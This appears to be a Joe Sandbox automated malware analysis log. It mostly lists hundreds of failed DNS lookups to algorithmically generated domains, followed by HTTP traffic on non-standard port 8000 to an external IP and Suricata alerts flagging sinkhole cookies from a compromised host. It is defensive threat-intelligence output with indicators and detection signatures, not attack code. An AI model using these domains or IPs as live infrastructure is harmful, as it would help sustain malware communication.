Source: unknownDNS traffic detected: query: galyhiw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedysov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacypyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupypiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purytyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyxov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganydiw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryvex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyjoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyvod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufyjuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonypyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyzoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqykog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowydic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyrom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyqow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyjuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyjig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetylyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volymum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumybal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyzek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumymuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrytun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymymud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyquq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganycuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyvas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykynyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyqog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopybyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvylyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyhob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebysul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacydib.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocymut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyzys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyduz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupygel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebytiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupymyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatynes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyqat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyjyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyqaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupycuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvywed.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyjof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahycib.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyzyh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexylup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojymic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumypog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyryc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzybep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyzas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyhyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyjut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufydep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykynon.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyhyw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysytyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyfar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufypiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyrev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacynuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykytej.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowycac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purypol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyjun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganykaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyrak.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryjir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvytuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyjic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyqiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyvis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujypup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegykiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykygur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyduh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyhuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganypih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyrag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowypit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyqub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyryw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyqyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryled.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqynyw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryjil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyjaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupywog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyfah.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyhev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocydof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonygec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetytav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purygeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyqys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqytal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekysip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykymyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebynyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyjyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujygul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzytap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyfob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqytup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufywil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatycyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqycos.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyxyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowygem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqypew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyhil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyfow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegylep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyvep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahynaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexykaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyfir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacycus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumycug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyxyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyriz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galycuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofymem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrymuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyfav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxywer.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyxyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykysix.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojycif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyxug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyjon.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocypyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyqil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvygyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvydov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyliq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyteq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyfoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopydum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyros.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvytuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekykev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujymel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyfog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvybeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyjuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyxip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujydag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonybat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedysyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopymyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopygat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyrys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojybek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyvar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexytep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufydul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyviw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysynur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyquz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzylol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyquf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryxag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymytar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymytux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetykol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocygyk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysynaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedytul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekynog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqykus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujywiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyrov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyxiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyqim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufycol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyner.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryxen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyqaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumylel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyzuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufytev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumytol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volykyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyrac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebykul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupybul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyfaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyxux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyzez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyxup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymywaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrynad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyruk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyxur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyroh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetysal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyhys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyhuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyciq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyrym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purypyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyzaw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysylej.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galynab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofypuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyjup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galykiz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyqis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqynel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymysud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryxuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyzeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxywij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purybav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufymoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volygyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqycyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqylyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyxep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyvop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyjyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzywel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyvav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupylaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyteg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumypyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzymig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyjav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvytan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyfyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvymir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galydoz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymylij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyqob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygysij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyboq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyfad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowypek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyjox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyxex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujycov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyfew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purymuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyjuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetynev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxygud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetysuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrywax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopydek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqysuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyjad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyged.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyfil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyjuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyraw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygymoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygymyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryfox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqypiz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvywup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganynyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyguj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galykes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojypuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocykif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvytag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyqyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopycyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysysyx.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvywav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufyxug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedykiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygylax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyger.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexylal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekylag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufypeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvynen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvywux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyqug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyquk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyvix.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyfex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzydal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyjid.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyfes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyzym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyqop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvysur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadydas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyfin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volycik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonykuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxylux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojydam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufybop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyrot.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzywuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrysyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyxiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygytyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyvig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopybok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyleq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volybec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocybam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumydoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyvoz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyfyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyjok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqydus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyreh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyjyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyxyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyloq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymysan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofydut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyxeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyxun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojymet.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofybic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahydoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryvur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufylap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyfeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadykos.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvylyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekytyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyzub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvypul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyfen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvycip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumygyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxytex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyref.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebykap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqydeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxysun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyryl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegynuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purylev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykylan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyzac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymygyx.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyzam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopypec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyquc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekynuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyrez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyket.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopypif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufygav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganypeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzymev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyvew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujylog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyvoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatypub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygygin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatykow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyreq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykywid.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyjym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygynox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedynul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebylug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyzuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyqoc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowycut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexynyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocykem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojygut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyqup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyheh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujybyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyguv.com replaycode: Name error (3)
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 64057 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 64057
Source: unknownNetwork traffic detected: HTTP traffic on port 64057 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 64057
Source: unknownNetwork traffic detected: DNS query count 1000
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012F4F80 IsNetworkAlive,#680,DnsFlushResolverCache,CreateThread,memset,lstrcpynA,lstrcpynA,StrNCatA,StrNCatA,InternetCheckConnectionA,InternetCheckConnectionA,memset,lstrcpynA,StrNCatA,InternetCheckConnectionA,22_2_012F4F80
Source: global trafficTCP traffic: 192.168.2.10:64057 -> 106.15.232.163:8000
Source: global trafficDNS traffic detected: number of DNS queries: 1000
Source: Joe Sandbox ViewIP Address: 3.94.10.34 3.94.10.34
Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.10:49723
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.10:49723
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.10:49725
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.10:49725
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.10:49736
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.10:49736
